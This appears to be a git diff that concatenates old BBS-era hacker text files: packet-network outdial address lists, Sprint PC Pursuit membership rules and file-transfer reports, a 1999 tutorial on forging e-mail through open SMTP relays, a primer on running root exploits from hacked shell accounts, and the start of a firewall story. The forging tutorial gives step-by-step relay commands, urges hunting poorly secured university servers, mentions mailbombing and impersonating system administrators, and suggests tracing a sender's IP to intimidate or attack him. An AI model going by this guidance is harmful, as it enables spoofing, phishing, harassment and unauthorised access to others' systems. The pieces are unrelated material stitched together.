3110 3030 0115 (1200 baud) (CODEN)
3110 3030 0021 (2400 baud) (E.C. 303)
3110 3030 0022 (2400 baud)
3110 3050 0120 ( 300 baud) (Miami, FL)
3110 3050 0121 (1200 baud) (FLMIA)
3110 3050 0112 (2400 baud) (E.C. 305)
3110 3120 0410 ( 300 baud) (Chicago, IL)
3110 3120 0411 (1200 baud) (ILCHI)
3110 3120 0024 (2400 baud) (E.C. 312,1-815)
3110 3130 0214 ( 300 baud) (Detroit, MI)
3110 3130 0216 (1200 baud) (MIDET)
3110 3130 0024 (2400 baud) (E.C. 313)
3110 3140 0005 ( 300 baud) (St. Louis, MO)
3110 3140 0421 (1200 baud) (MOSLO)
3110 3140 0020 (2400 baud) (E.C. 314, 1+217, 1+312, 1+815)
3110 4040 0113 ( 300 baud) (Atlanta, GA)
3110 4040 0114 (1200 baud) (GAATL)
3110 4040 0022 (2400 baud) (E.C. 404)
3110 4080 0111 ( 300 baud) (San Jose, CA)
3110 4080 0021 (1200 baud) (CASJO)
3110 4080 0110 (2400 baud) (E.C. 408, 1+415)
3110 4140 0020 ( 300 baud) (Milwaukee, WI)
3110 4140 0021 (1200 baud) (WIMIL)
3110 4140 0120 (2400 baud) (E.C. 414)
3110 4150 0005 ( 300 baud) (Oakland, CA)
3110 4150 0216 (1200 baud) (CAOAK)
3110 4150 0011 (2400 baud) (E.C. 415)
3110 4150 0106 ( 300 baud) (Palo Also, CA)
3110 4150 0224 (1200 baud) (CALPAL)
3110 4150 0108 (2400 baud) (E.C. 415)
3110 4150 0215 ( 300 baud) (San-Francisco, CA)
3110 4150 0117 (1200 baud)
3110 4150 0217 (1200 baud) (CASFA)
3110 4150 0220 (1200 baud)
3110 4150 0023 (2400 baud) (E.C. 415)
3110 5030 0020 ( 300 baud) (Portlan, OR)
3110 5030 0021 (1200 baud) (ORPOR)
3110 5030 0120 (2400 baud) (E.C. 503)
-RL-----------------------------------------------------------------Page 3
3110 6020 0020 ( 300 baud) (Phoenix, AZ)
3110 6020 0021 (1200 baud)
3110 6020 0022 ( 300 baud)
3110 6020 0023 (1200 baud) (AZPHO)
3110 6020 0026 (2400 baud) (E.C. 602)
3110 6120 0120 ( 300 baud) (Minneapolis, MN)
3110 6120 0121 (1200 baud) (MNMIN)
3110 6120 0022 (2400 baud) (E.C. 612)
3110 6170 0311 ( 300 baud) (Boston, MA)
3110 6170 0313 (1200 baud) (MABOS)
3110 6170 0026 (2400 baud) (E.C. 617 1+508)
3110 7130 0113 ( 300 baud) (Houston, TX)
3110 7130 0114 (1200 baud) (TXHOU)
3110 7130 0024 (2400 baud) (E.C. 713)
3110 7140 0023 ( 300 baud)
3110 7140 0004 (1200 baud) (CACOL)
3110 7140 0024 (2400 baud)
3110 7140 0119 ( 300 baud) (Santa Ana, CA)
3110 7140 0213 (1200 baud) (CASAN)
3110 7140 0124 (2400 baud) (E.C. 714)
3110 7140 0120 ?( 300 baud) (San Diego, CA)
3110 7140 0102 ?( 300 baud) (CASAD/CASDI)
3110 7140 0210 (1200 baud) (E.C. 619)
3110 7140 0121 (2400 baud)
3110 8010 0020 ( 300 baud) (Salt-Lake-City, UT)
3110 8010 0021 (1200 baud) (UTSLC)
3110 8010 0012 (2400 baud) (E.C. 801)
3110 8130 0020 ( 300 baud) (Tampa, FL)
3110 8130 0021 (1200 baud) (FLTAM)
3110 8130 0124 (2400 baud) (E.C. 813)
3110 8160 0104 ( 300 baud) (Kansas City, MO)
3110 8160 0221 (1200 baud) (MOKAN)
3110 8160 0113 (2400 buad) (E.C. 816, 1+913)
3110 8180 0020 (1200 baud) (Glendale, CA)
3110 8180 0021 (1200 baud) (CAGLE)
(E.C. 818)
3110 9160 0007 ( 300 baud)
3110 9160 0011 (1200 baud) (CASAC)
3110 9160 0012 (2400 baud)
3110 9190 0020 ( 300 baud) (Res-Tri-Park, NC)
3110 9190 0021 (1200 baud) (NCRTP)
3110 9190 0124 (2400 baud) (E.C. 919)
-RL-----------------------------------------------------------------Page 4
Datapac Canadien Outdials, listed numerically by areacode. Far right
columns are Timezone and City.
3020 6920 0902 ( 300 baud) (204, Manitoba, Winnipeg)
3020 6920 0901 (1200 baud)
3020 7210 0900 ( 300 baud) (306, Mountain, Regina)
3020 7210 0901 (1200 baud)
3020 7110 0900 ( 300 baud) (306, Mountain, Saskatoon)
3020 7110 0901 (1200 baud)
3020 6330 0900 ( 300 baud) (403, Mountain, Calgary)
3020 6630 0901 (1200 baud)
3020 5870 0900 ( 300 baud) (403, Mountain, Edmonton)
3020 5870 0901 (1200 baud)
3020 9160 0901 ( 300 baud) (416, Eastern, Toronto)
3020 9160 0902 (1200 baud)
3020 3850 0900 ( 300 baud) (416, Eastern, Hamilton)
3020 3850 0901 (1200 baud)
3020 7460 0900 ( 300 baud) (506, Alantic, Saint john)
3020 7460 0901 (1200 baud)
3020 8270 0902 ( 300 baud) (514, Eastern, Montreal)
3020 8270 0903 (1200 baud)
3020 3560 0900 ( 300 baud) (519, Eastern, London)
3020 3560 0901 (1200 baud)
3020 2950 0900 ( 300 baud) (519, Eastern, Windsor)
3020 2950 0901 (1200 baud)
3020 3340 0900 ( 300 baud) (519, Eastern, Kitchener)
3020 3340 0901 (1200 baud)
3020 6710 0900 ( 300 baud) (604, Pacific, Vancouver)
3020 6710 0901 (1200 baud)
3020 8570 0901 ( 300 baud) (613, Eastern, Ottawa)
3020 8570 0902 (1200 baud)
3020 3850 0900 ( 300 baud) (613, Eastern, Hamilton)
3020 3850 0901 (1200 baud)
3020 7810 0900 ( 300 baud) (709, Atlantic, St. john's)
3020 7810 0901 (1200 baud)
3020 7610 1900 ( 300 baud) (902, Atlantic, Halifax)
3020 7610 1901 (1200 baud)
3020 3850 0900 ( 300 baud) (416, Eastern, Hamilton)
3020 3850 0901 (1200 baud)
-RL-----------------------------------------------------------------Page 5
3020 9190 0900 ( 300 baud) (???, Eastern, Clarkson)
3020 9190 0901 (1200 baud)
We do NOT condone fraud, destruction of computer data or tangeble items.
We do not condone information hoarding, and accumulations stacks of informatio
n on individuals which corporations have no business accumulating. Companies
are free to give your information to other companies. And we feel vindicated
in examining the information about ourselves firsthand!
Down with buerocracy!
Hail Eris!
All Hail Discordia!
-Net Runner, Precentor East
-RL-----------------------------------------------------------------Page 6
Downloaded From P-80 International Information Systems 304-744-2253
+64
View File
@@ -0,0 +1,64 @@
DISABLED MEMBERSHIP GUIDELINES AND RULES
Effective April 13,1992
Sprint will recognize any individual who has a permanent impairment
that substantially limits that individual's ability to take care of
himself or herself, perform manual tasks, walk, see, hear, speak, breathe,
learn, or work, as a prospect for Disabled Membership. Prospects must
submit their name, address, telephone number (and PC Pursuit ID if an
existing customer). Additionally, they must submit one of the
following: (1.) a letter from a licensed physician describing
the prospect's disability and how it substantially limits one or more
of the major life activities listed above or (2.) a copy of an award
letter from the Social Security Administration for Supplemental
Security Income (SSI) or Disability benefits. If the award letter is
not dated within the last 12 months please provide a copy of a
current benefit statement as well. Such letters and statements can
be obtained from local SSA offices or by the calling the SSA toll
free number 1-800-772-1213.
Verification of disability should be sent to:
Manager, PC Pursuit Disabled Program
Mail Stop VARESA0112
Sprint
12490 Sunrise Valley Drive
Reston, Va. 22096
Prospects will be notified via mail of their status under the
Disabled Membership program. We ask your cooperation in submitting
valid requests.
Disabled Membership Rules:
o An individual may have only one account.
o A Disabled Membership may not be shared.
o Disabled Membership includes up to 90 hours of non-prime time usage
for $30 per month. Non-prime time usage over 90 hours will be billed
at $3 per hour. Prime time usage will be billed at $10.50 per hour.
All other terms as provided on the current rate schedule will apply.
o Information regarding Disabled Memberships will be maintained by US
Sprint in confidence and will not be used for any other purpose.
o US Sprint reserves the right to modify these guidelines and rules at
any time and to determine who will qualify for this membership.
If you have any questions about this notice please send a message to
the Product Management area. We are not recognizing Handicapped permits
issued by state motor vehicle agencies due to the differing
requirements from state to state.
Thank you

File diff suppressed because it is too large Load Diff
+50
View File
@@ -0,0 +1,50 @@
The wonderful and evil world of e-mail
The art of e-mail forging and tracing explained in one simple text
This is my second article on hacking my first being the ethics of a true hacker which is available on my website at http://www.angelfire.com/co/hackethics/index.html. This article will touch on the subject of mail forgery and tracing. Please beaware any info learned this article is to be used only for the purposes of information and not wrong doing. The Mob Boss will in no way be responsible for your stupidity. Now on with the article. Now there has been several guides written about this on the internet yet a lot of people still don't understand or haven't have read about it yet. Most of the guides fail to show you how to find a willing server as well since that is the major problem these days.
I. Forgery
-E-mail forging, how is this done?
This is quite easy to do as long as you can type and boot up telnet. Telnet is a program for connecting to remote hosts and it ships with 95/98. To run this program simply goto run then telnet or the ms-dos prompt then simply type telnet while in the c:\windows. Thats simple enough and I hope that every newbie hacker who is running windows becomes good freinds with telnet because if you want to ever want to hack your going to do it through it telnet that is for sure when you are running windows for your main operating system. Now the second step is connecting to a remote host, the computer you want to do this from. Now I will almost garuntee on your first shot you will not get to forge mail your first time because over the years sercurity has become better and sysadmins are stoping the routing of mail. Anyways, click file and then remote host. This brings up a box in which you choose a port and a host. Now for port notice that a default value of telnet is in there. Thats the equivelent of port 23. That is used to physically log into a system such as into your ISP shell account which allows you to give unix commands to one of your ISP's computers. We won't be working with that default port, the telnet one, we will be working with port 25 the SMTP port which is the port that sends out mail. This is the port which mail forging, mailbombers, and those sendmail exploits you see so much of occur on. So lets begin by choosing a host and then a port 25. Now if this doesn't work on the first computer don't get discouraged thats the best trait a hacker can display, persistance. Now when we telnet in we will be dislayed with a welcome message which will have the computer's name and hostname. It will be followed by the daemon software they are using usually sendmail, which runs on a UNIX platform and is to say the least an intruders best freind in gaining root. Now the second step is to greet the computer (they have feelings too you know):
helo Dreamer.Foobar.com
Then the computer will say hello and will display where they logged you from. The next thing to do is to specify a return address. For this put in any god damn thing you want, remember you are in controll muhahahahahah:
mail from: President@whitehouse.gov
Now if everything goes according to plan and the machine allows routing well then bingo you won the booby prize. But were getting ahead of ourselves there is still another crucial step. We have to specify a recipent which will tell us wether or not this computer wants to be our freind or not:
rcpt to: Lewinsky@interns.com
Now if you get a message such as, Sorry routing not allowed, well then your out of luck and move onto the next machine. But if it excepts it then you have found that trusting machine. Notice on the different machines how the message, "Routing denied", can vary in its tone and pleasentness. Anyways on to the next step the body of the message:
data
This tells the computer you are ready to write the message. It will then say enter your message and end by hitting enter, then a period by its self and enter.
Hey Monica my place or yours?
.
Then it will say message excepted for delivery. Just enter the command exit and it will close you out of the system. Its thats simple.
-What the hell is this any use for?
This is one of those most basic and helpful hacks you can learn. Wether you aspire to be an evil criminal, or in the words of Carolyn Meinel, a whitehat hacker then you need to know this. It gives you some practice in a command line atmoshpere where all the real hacking takes place, very little is or can be done in a graphical windows interface. Now the other thing this is good for is if you are a eagar beaver when it comes to socail engineering. The wonderful things that could be done with an e-mail appearing to be from system administration. Another handy thing is that this can be used as an impressive trick to show your freinds who are clueless in AOL la la land. They'll find this very impressive. If you have ever used a mailbomber maybe you'll remeber it asking for a server and it allowed you to send e-mail from any address. This is all because it uses the same princible that we have learned today. As you can see this is quite useful for a variety of things and is something every ispiring hacker should learn.
-WHAT THE FUCK, It won't let me route or something?
Ok now, calm down. The reason is because the sysadmin at the computer you were trying to telnet into and forge from is smarter then the average bear. But this is the MOB BOSS your talking too so of course I'll give you ome hins on how to find open boxes. First of all don't attempt this on any military computers all you 31337 hacker buffs, unless you enjoy be interogated (though I should write an article on that). Now after you narrow that down try to forget about goverment computers like courthouses and state agencies. Although there are some good boxes its a unnesscary risk. Your best bet will definitely be *.edu servers. Colleges and Universitys have the most lazy sercurity although I have found some very sercure computers at those places of learning. A good place to start looking is on a search engine such as altavista (www.altavista.com). From there, pour yourself a big cup of coffee and prepare for some searching. Look up unversities and colleges. There are so many variations you can do, its pathetic. Now make a nice long list of them and then once you have a fair amount hosts start telneting. This might be a happy or discouraging moment but no matter what don't give up. Persistance will beat all, at least most of the time. Take a look at the versions of sendmail, those computers that are paying off are usually old dusty versions huh? Anyways I have found this the best way to look. Now these can be used for a variety of purposes. Mailbombing and mail forging alike but under all cirumstances be sure not to use one server too much. This can piss of a sysadmin royally especially if you and a buddy are being idiots and using his computers to mailbomb constantly. If you do idiotic things like this expect your isp to find out and kick your ass off. Now since good isp's are hard to come by these days this might be a royal pain in the ass so watch yourself. Now once you have a few computers which route go trade with freinds who do the same or in chat rooms. Expect that they'll want something in return though. Nothing is free.
II. Tracing e-mail
-Whats the point?
Well ever want to get revenge on that spammer or the schmuck who bombed you well tracing the messages back to the idiots isp is a good start. Now also I have had many attempts on my accounts with trojans and viruses but once I spotted the mini intruders I traced it back to the isp and informed his sysadmin. Never had anything else from him again hahahahahahaha. Also its the best way to scare a stalker or an abuser. Those threatening e-mails may leave some people helpless but we are hackers so we take action. The hunted becomes the hunter. This can all be don by turning an e-mail and tracing it.
-Ok sounds good so how is it done?
First step is to check out the full header. I am way too lazy to tell you how to do this because its in the manual but I'll tell you right now on web based e-mail the option for full headers is usually in options although on hotmail I hit reply and the header is right there. Ask your tech support people if you can't figure it ou yourself. Anyways in that header there is a variety of info there that we want to know. There are two main things you want to know though. The biggest is going to be mail received from thing. Its here where you want to look for an ip address. One you have that its time to DNS that. If you have a shell account goto it and do nslookup ip addy. Once you get the servers name you'll do a whois query. Hopefully your target has a small isp or university account. If this is true you will know his state and possibly town. Using this info casually in an e-mail to him will make him worry. Also you will know have the power to inform the sysadmin of the ip addy and exact time it was sent. This is so simple yet very few people do it. My suggestion is to look at all full headers you can. It will give you addresses to telnet into look around and will also give you the power to know exactly who the son of a bitch is. Now if you want to be really slick you might have one of those yahoo accounts and will be informed immediately of any new mail which was just sent then you'll have his current ip hahahahaha. This might be the perfect time to attack. teach the guy a lesson if you must or turn him in its up to you. Practice this techniques you never know when it'll come in handy.
This article has been written by THE MOB BOSS aka Mafia_man777
Co-edited by Dragoonx
This has been a publication written by THE MOB BOSS, he is in no way responsiple for the accuracy or results from the use of info in this article. anything done is totatly done at the users discretion. THE MOB BOSS in know way or form supports, aids, particapates in the act of criminal hacking or phreaking. Any ideas, beliefs, and information gathered in all publications published by THE MOB BOSS is strictly for informational purposes only.
THE MOB BOSS copyright 1999 all rights reserved
+620
View File
@@ -0,0 +1,620 @@
RECOMMENDATIONS REPORT
(Revised)
for
File Transfer Via PC Pursuit
(Jan 03, 1989)
Sprint
Field Operations HQ Tech Support
Reston, Virginia
CONTENTS
--------
PAGE
----
1.0 Introduction........................................... 1
2.0 Recommendations........................................ 2
3.0 File Transfer Procedures............................... 5
4.0 Summary................................................ 6
5.0 Troubleshooting........................................ 7
SECTION 1.: Introduction
------- - ------------
Because of many customer complaints concerning PC Pursuit's inability
to allow file transfers, Field Operations was requested to provide
recommendations for file transfer via PC Pursuit. In compliance with
this request, this document provides the following:
* Recommendation on the best file transfer protocols to be used
with PC Pursuit.
* Recommendation on the hunt-confirm sequence and line parameters
which provide optimum performance of various protocols.
* The average transfer rates which can be expected using the
correct hunt-confirm sequence and optional parameter settings.
- 1 -
SECTION 2.: Recommendations
------- - ---------------
This section outlines the most common file transfer protocols used
with PC Pursuit. The performance of the protocols in the direct con-
nect and PC Pursuit environments are also indicated.
The following protocols were tested via the Chicago in-dial to the
Washington DC out-dial; the observations are summarized below.
XMODEM
PC Pursuit XMODEM file transfers performed at an average throughput of
34% when the correct hunt-confirm and terminal type was utilized.
XMODEM does not support flow control, therefore it is suggested that
the "relaxed" mode be invoked if the user's communications software
permits this feature.
YMODEM
The performance of YMODEM file transfers VIA PC Pursuit was found to
have an average throughput of 77% when the correct hunt confirm and
terminal type is employed. Although YMODEM does not support flow
control, it uses large 1024 byte packets which the network PAD handles
quite readily under normal conditions. As a result, YMODEM is rated
one of the faster protocols for file transfer via PC Pursuit.
WXMODEM
WXMODEM file transfers utilizing the correct hunt-confirm and terminal
type performed well with an average transfer rate of 82%. This
protocol is capable of handling flow control which enables it to
perform with better reliability in the PC Pursuit environment. Users
should be aware that an early version of PROCOMM is known to have a
software problem which can affect the performance of WXMODEM file
transfers.
KERMIT
An optimum average throughput of 65% was obtained by KERMIT file
transfers via PC Pursuit. The throughput was obtained with a packet
size of 90 and a window size of 31. KERMIT software which supports the
sliding window feature performs with optimum efficiency in the PC
Pursuit environment.
- 2 -
SEALINK
SEALINK file transfers via PC Pursuit performed exceptionally well
with an average throughput of 91% with the correct hunt-confirm and
terminal type. SEALINK supports flow control and was specifically
designed to operate in the networking environment. Some versions of
SEALINK however, do not provide proper error recovery which could pose
a problem for some users.
ZMODEM
File transfers utilizing ZMODEM protocol via PC Pursuit yielded an
average transfer rate of 93%. ZMODEM performs well in the PC Pursuit
environment at the default settings. Depending on the type of user
equipment, ZMODEM options may need to be modified to permit optimum
throughput. The ZMODEM command line used in our test configuration was
simply as follows:
Uploads: DSZ port 1 rz
Downloads: DSZ port 1 sz
The X.3 PAD parameters which provide optimum performance are
1:0,4:10,5:1, 7:8,12:1. In addition, flow control (XON/XOFF) should be
enabled at the user PC and the host. It should be noted that in most
cases these additional PAD parameters are optional and need only be
employed if the user is experiencing difficulty transferring files via
ZMODEM.
The following page summarizes file transfer performance of the
protocols tested. The protocols are listed in order (PCP best to
worst) in two categories: 1) performance via direct connect, 2) per-
formance via PC Pursuit utilizing the recommended hunt confirm and
parameter settings shown. It should be noted that the optional
parameters need only be employed if a user experiences problems with
transferring a particular file.
- 3 -
SECTION 3.: File Transfer Procedures
------- - ------------------------
This section outlines the step by step procedure for executing file
transfers via PC Pursuit. These procedures must be followed exactly to
achieve optimum transfer rates. The optional X.3 parameters shown on
the previous page indicates the parameters which provide the best
transfer rates as well as reduce the possibility of aborts.
STEP 1.: Set PC communications software to 8 bits, no parity,
1 stop bit, full duplex. At this time, the user may wish
disable or enable local (XON/XOFF) flow control depending
on the type of protocol to be used.
STEP 2.: Dial local rotary with the communications software
set at the desired speed.
STEP 3.: Upon connect use the correct hunt confirm sequence:
At 300/1200bps use - <CR D CR>
At 2400bps - <@ D CR>
NOTE: "D" MUST BE UPPER CASE.
STEP 4.: At prompt "TERMINAL = " enter <D1> and return.
STEP 5.: At the "@" prompt enter the destination mnemonic,
out-dial speed, ID and password. It is important
that out-dial speed matches in-dial speed.
DO NOT MIX IN-DIAL AND OUT-DIAL SPEEDS.
STEP 6.: If OPTIONAL X.3 pad parameters are to be changed, do
so at this point by entering <@ CR>. To set parameters
as prescribed perform the following:
To set parameters enter <SET parameter,parameter>
Example: SET 7:8,4:10,5:1,7:8,12:1
To read parameters enter <PAR?>
Return to out-dial port by entering
<CONT>.
STEP 7.: Upon connecting to the destination pad, ensure
communication with the out-dial modem by entering <ATZ>.
The destination modem will respond with "OK".
STEP 8.: Enter <ATD> and the local number you wish to dial.
STEP 9.: Queue host file transfer and start file transfer.
Please note that these are the basic steps needed to achieve success-
ful file transfers. Since communications software may vary from
package to package, additional steps may be needed to initiate the
start of the file transfer at the user software level.
- 5 -
SECTION 4.: Summary
------- - -------
Extensive testing has resulted in identifying the expected performance
of six file transfer protocols when used with PC Pursuit. These
protocols have been determined to perform satisfactorily with PC
Pursuit when the correct hunt-confirm, terminal type and parameters
are employed.
It is the recommendation of Field Operations that customers be in-
formed of the correct logon procedures and the protocols which provide
the most reliable file transfers. Customers should also be reminded
that PCP users can expect a small degree of network delay which is
considered a common characteristic of packet switched networks. In
addition, users should also be informed that poor quality voice grade
telephone lines can adversely affect file transfer sessions.
Field Operations is one of many Sprint groups dedicated to providing
customers with complete support for PC Pursuit. Field Operations will
offer assistance with file transfer problems providing the customer is
willing to release a copy of the problem software as well as provide
the pertinent information necessary to resolve the problem.
- 6 -
SECTION 5.: Troubleshooting
------- - ---------------
If you are experiencing trouble with PC Pursuit check the following
items:
* Verify the correct hunt-confirm sequence
* Verify user software comm parameters are set to 8 bits, no parity and
1 stop bit.
* If problems with file transfer only, try the optional ITI PAD parameters.
If all else fails, then call Sprint Customer Service and report the
problem. Be prepared to provide the following:
* Type of communication software
* Type of PC, make and model
* Type of modem
* Call origin (in-dial city)
* Call destination (out-dial city)
* Speed in
* Speed out
* Type of session
* Time of failure
* Date of failure
* Point of failure in session
* Out-dial number
* Network Addresses (shown at login, and by command "STAT"
when connected to out-dial port)
Additional information may be required depending on the nature of
the problem.
- 7 -
FILE TRANSFER
PERFORMANCE STATISTICS
General Communication Parameters = 8 bits
1 stop bit
N no parity
Terminal Type = D1
| PERFORMANCE STATISTICS DIRECT CONNECT |
| |
| |
| XFR |
| PROTOCOL SPEED SECONDS CPS BPS RATE |
|======================================================|
| |
| ZMODEM UP 1200 ***394 114.36 1143.55 95% |
| ZMODEM UP 2400 ***199 226.41 2264.12 94% |
| ZMODEM DN 1200 ***394 114.36 1143.55 95% |
| ZMODEM DN 2400 ***196 229.88 2298.78 96% |
| |
| SEALINK UP 1200 ***418 107.79 1077.89 90% |
| SEALINK UP 2400 ***200 225.28 2252.80 94% |
| SEALINK DN 1200 ***400 112.64 1126.40 94% |
| SEALINK DN 2400 ***205 219.79 2197.85 92% |
| |
| WXMODEM UP 1200 ***405 111.25 1112.49 93% |
| WXMODEM UP 2400 ***205 219.79 2197.85 92% |
| WXMODEM DN 1200 **277 96.12 961.16 80% |
| WXMODEM DN 2400 ***216 208.59 2085.93 87% |
| |
| YMODEM UP 1200 ***387 116.42 1164.24 97% |
| YMODEM UP 2400 ***194 232.25 2322.47 97% |
| YMODEM DN 1200 ***385 117.03 1170.29 98% |
| YMODEM DN 2400 ***199 226.41 2264.12 94% |
| |
| KERMIT UP 1200 ***553 81.48 814.76 68% |
| KERMIT UP 2400 ***287 156.99 1569.90 65% |
| KERMIT DN 1200 ***571 78.91 789.07 66% |
| KERMIT DN 2400 ***295 152.73 1527.32 64% |
| |
| XMODEM UP 1200 ***425 106.01 1060.14 88% |
| XMODEM UP 2400 ***219 205.74 2057.35 86% |
| XMODEM DN 1200 ***436 103.34 1033.39 86% |
| XMODEM DN 2400 ***228 197.61 1976.14 82% |
=======================================================
* Optional PAD parameters which optimize performance
** File size = 26624 *** File size = 45056
| PERFORMANCE STATISTICS VIA PCP |
| |
| HUNT OPTIONAL ITI |
| XFR CONFIRM FLOW X.3 PAD |
| PROTOCOL SPEED SECONDS CPS BPS RATE SEQUENCE CONTROL PARAMETERS NOTES |
|====================================================================================================================|
| |
| ZMODEM UP 1200 ***399 112.92 1129.22 94% CR D CR XON/XOFF *1:0,4:10,5:1,7:8,12:1 *Host a terminal XON/XOFF |
| ZMODEM UP 2400 ***200 225.28 2252.80 94% @ D CR XON/XOFF *1:0,4:10,5:1,7:8,12:1 *Host a terminal XON/XOFF |
| ZMODEM DN 1200 ***398 113.21 1132.06 94% CR D CR XON/XOFF *1:0,4:10,5:1,7:8,12:1 *Host a terminal XON/XOFF |
| ZMODEM DN 2400 ***204 220.86 2208.63 92% @ D CR XON/XOFF *1:0,4:10,5:1,7:8,12:1 *Host a terminal XON/XOFF |
| |
| SEALINK UP 1200 ***420 107.28 1072.76 89% CR D CR XON/XOFF *7:8,1:0 *Host a terminal XON/XOFF |
| SEALINK UP 2400 ***202 223.05 2230.50 93% @ D CR XON/XOFF *7:8,1:0 *Host a terminal XON/XOFF |
| SEALINK DN 1200 ***402 112.08 1120.80 93% CR D CR XON/XOFF *7:8,1:0 *Host a terminal XON/XOFF |
| SEALINK DN 2400 ***207 217.66 2176.62 91% @ D CR XON/XOFF *7:8,1:0 *Host a terminal XON/XOFF |
| |
| WXMODEM UP 1200 ***406 110.98 1109.75 92% CR D CR XON/XOFF *7:8,1:0 *Host a terminal XON/XOFF |
| WXMODEM UP 2400 ***263 171.32 1713.16 71% @ D CR XON/XOFF *7:8,1:0 *Host a terminal XON/XOFF |
| WXMODEM DN 1200 ***469 96.07 960.68 80% CR D CR XON/XOFF *7:8,1:0 *Host a terminal XON/XOFF |
| WXMODEM DN 2400 ***214 210.54 2105.42 88% @ D CR XON/XOFF *7:8,1:0 *Host a terminal XON/XOFF |
| |
| YMODEM UP 1200 ***467 96.48 964.80 80% CR D CR NONE *7:8,1:0 |
| YMODEM UP 2400 ***252 178.79 1787.94 74% @ D CR NONE *7:8,1:0 |
| YMODEM DN 1200 ***461 97.74 977.35 81% CR D CR NONE *7:8,1:0 |
| YMODEM DN 2400 ***263 176.00 1760.00 73% @ D CR NONE *7:8,1:0 |
| |
| KERMIT UP 1200 ***558 80.75 807.46 67% CR D CR XON/XOFF *7:8,1:0 |
| KERMIT UP 2400 ***285 158.09 1580.91 66% @ D CR XON/XOFF *7:8,1:0 |
| KERMIT DN 1200 ***579 77.82 778.17 65% CR D CR XON/XOFF *7:8,1:0 |
| KERMIT DN 2400 ***297 151.70 1517.04 63% @ D CR XON/XOFF *7:8,1:0 |
| |
| XMODEM UP 1200 ***985 45.74 457.42 38% CR D CR NONE *7:8,1:0 |
| XMODEM UP 2400 ***636 70.84 708.43 30% @ D CR NONE *7:8,1:0 |
| XMODEM DN 1200 ***1001 45.01 450.11 38% CR D CR NONE *7:8,1:0 |
| XMODEM DN 2400 ***636 70.84 708.43 30% @ D CR NONE *7:8,1:0 |
======================================================================================================================
* Optional PAD parameters wich optimize performance ** File size = 26624 *** File size = 45056

+41
View File
@@ -0,0 +1,41 @@
Equipment and Software Requirements
-----------------------------------
To use PC PURSUIT, all you need are --
- a telephone line
- a modem - 300 or 1200 or 2400bps
- a terminal or a PC with asynchronous communications software
PARAMETERS:
-----------
Communication parameters for your hardware should be set-up
consistent with the PC or BBS or host computer you wish to dial.
FILE TRANSFERS:
---------------
Most transfer protocols are compatible with PC PURSUIT.
Across SPRINTNET'S Public Data Network, PC PURSUIT transmits
data utilizing 8 bit transparency. Due to XMODEM'S use of
single block by block acknowledgement of data sent, XMODEM
file transfers can take slightly longer. There are
however, more efficent transfer protocols such as KERMIT,
SUPER KERMIT and YMODEM.
You can dial into SprintNet as 7-E-1 or 8-N-1. If you dial
in at 7-E-1, you can switch your parameters to 8-N-1 with
your software to prepare for a file transfer. Or, dial
SprintNet at 8-N-1 to begin with, using these steps --
1) Dial your SprintNet local access number with your settings
at 8-N-1 and 2400 bps.
2) Enter @ D (cr)
3) At "Terminal = ", enter D1 (cr)
4) proceed with your session....

File diff suppressed because it is too large Load Diff
+83
View File
@@ -0,0 +1,83 @@
############################################################################
############################## LEGIONS OF THE UNDERGROUND ##################
*********************************__ *********************_____ **** ____************
********************************/ /*********========***|___ /****/ ___/***********
*******************************/ /*********/ ___ /******/ /****/ /***************
******************************/ /*********/ / / /******/ /****/ /****************
*****************************/ /*********/ /__/ /******/ /****/ /*****************
****************************/ <______** / /******/ <____> /******************
***************************<__________| /_______/ *****(________/********************
(http://www.hackersclub.com/lou/)
--- Exploits ---
Alot of people ask me about exploits, what they are, what they do, and how
they use them. Well, I'm writing this document to explain this for hopefully
my last time. It's just starting to bother me that I have to explain this
everytime I'm on irc, so i thought there should be a text explaining them.
Well, here it is.
- miah
--- What is a ' Exploit ' ? ---
Well to explain this simply, a Exploit is a program that 'exploits' a bug
in a specific software. All exploits are different, they do different things
exploit different bugs, thats why exploits are allways program specific.
Exploits are made to get root on different operating systems. They achive
this by exploiting a bug in software when the software is running as root.
In UNIX type OS's, software may have to run as root ( or UID 0 ) in order to
perform a specific task that cannot be performed as another user. So basically
the exploit crashes the software while running as root to give you the beautiful
root prompt.
Well, now that I've answered questions one and two, I'm going to move on to
question 3.
--- How do I use a exploit? ---
Since exploits are coded in C 99% of the time, you need a shell on the box
you are going to use the exploit on, OR, you need to be running the same OS as
the box you are attempting to hack. So basically, you need to put the source
code, or the binary in your shell accounts dir, ( you want to use a hacked, or
a shell not yours for this :) ) to put it on your shell, you can ftp to your
account and upload it that way, or you can use rz if you are using a dialup shell.
either way, i shouldnt have to explain those to things to much, its pretty easy.
Once you have the exploit on the box you just need to compile it. Usually you
would compile the exploit like so;
blah:~/$gcc exploit.c
that should compile your exploit. However, be aware that some exploit coders
are sneaky pests, and like to pick on people who dont know C, so they will
sometimes insert bugs into the exploit, thus uninabiling it to be compiled. So
it does help to know C, when playing with C :)
After the compiling is done, you should beable to just run the exploit and its
work will be done when you see the root prompt. however, not all exploits are
the same, and might require different commandlines to get them to work.
--- Where can I get some exploits? ---
Well 2 of the best places i have found for exploits are
http://get.your.exploits.com
and
http://www.rootshell.com
they are both great resources of exploits and other information.
--- Conclusion ---
Well, that pretty much explains everything ya need to know about exploits.
If you think I should include any other information just email me at the
address provided below.
miah@hackersclub.com
+112
View File
@@ -0,0 +1,112 @@
@BEGIN_FILE_ID.DIZA text abou]t Internet f˜–irewalls.
@END_FILE_ID.DIZ
+----------------------------------------------------------------------------+
| |
| Internet Firewalls |
| |
| written by |
| |
| DARKSTAR/NFG |
| |
+----------------------------------------------------------------------------+
Ok, The Internet Firewall is a strange beast when you find one. It is for those
of you who don't know, a system that secures off a part of the net for pricate
or more interestingly for government use. You'll find things like the FBI,CIA
etc.. all on the other side of a firewall of some desciption. My research to
date has mainly been into the firewall that the FBI has, as that was the very
first such address I got.
I was hanging around the IRC on csdvax at nsw uni and a friend happened to
mention the address just as he logged off... it was pbi.fbi.gov, so i being the
good little hacker that i am had a pen beside me and wrote it down to look into
later on. Unfortunately this friend of mine is in Israel and was just leaving
when he gave it to me so i didn't have time to ask him anything about it.
l8r on i tried the address and found it came back with 'network unreachable'.
I found this odd as he had given me the address that he obviously had connected
to himself so i was wondering what the fuck was going on right? I got onto irc
and asked a dude in #hack about it. He said the FBI has a firewall and then he
went all quiet and wouldn't say another bloody word about it. Now just about
everyone knows that irc is logged. If you say anything like 'hack' 'hacked'
'password' 'passwd' etc.. the line of text gets written into a log.. and i mean
who wouldn't log it? i would too so u can't blame them. Anyhow i bugged this guy
'til he finally said 'get onto 'talk' and phne me' so i did, i phoned his
account and said 'ok what's the story' and he gave me the following.
